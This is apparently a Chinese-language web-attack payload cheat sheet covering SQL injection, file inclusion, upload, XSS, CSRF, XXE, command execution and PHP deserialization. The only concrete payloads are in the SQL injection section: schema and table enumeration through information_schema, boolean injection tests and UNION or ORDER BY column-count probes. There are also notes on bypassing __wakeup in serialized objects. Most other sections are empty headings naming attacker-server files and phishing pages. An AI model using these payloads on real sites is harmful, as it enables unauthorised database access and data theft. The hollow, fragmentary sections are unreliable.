Payload 总结

SQL注入

通用

select user(),version(),database()
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema=database()
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'

判断

// 字符型
?id=1xxx 			# 源码为 id='1xxx', 正常
?id=1' and '1'='1 	# 源码为 id='1' and '1'='1', 有回显
?id=1' and '1'='2 	# 源码为 id='1' and '1'='2', 无回显

// 数字型
?id=1xxx 		# 源码为 id=1xxx, 报错
?id=1 and 1=1 	# 源码为 id=1 and 1=1, 有回显
?id=1 and 1=2 	# 源码为 id=1 and 1=2, 无回显

// 列数
1' ORDER BY 3--+
1' GROUP BY 3--+
1' union select @,@,@--+

注入

绕过

等价替换

文件包含

常见的敏感信息路径

Windows

Linux/Unix

其他

可以通过 phpinfo() 中的 session.save_path 查看 session 的存储位置,默认为 /var/lib/php/session

payload

文件上传

php写shell

绕马

改包绕过

XSS

反射型

漏洞服务器

vul-page-reflected.php

模拟演示-GET型

攻击者服务器

/xss/cookie-get.php

/xss/hook-get.js

钓鱼页面

xss-get.html

模拟演示-POST型

攻击者服务器

/xss/cookie-post.php

/xss/hook-post.js

钓鱼页面

xss-post.html

存储型

漏洞服务器

vul-page-stored.php

DOM型

漏洞服务器

vul-page-dom.php

payload

CSRF

钓鱼页面

referer绕过

钓鱼页面

/csrf/hook.js

token绕过

钓鱼页面

/csrf/hook.js

SSRF

XXE

有回显

payload

无回显

攻击者服务器

attack.dtd

getcontent.php

payload

CRE

代码执行

命令执行

反序列化

访问控制符:public/protected/private

注意:

  • 属性数量大于真实数量时,会绕过 __wakeup 方法

  • protected 属性写成 S:6:"\00*\00age";,其中 \00 表示空格

  • private 属性写成 S:13:"\00People\00money";,其中 People 时类名

数组:

Last updated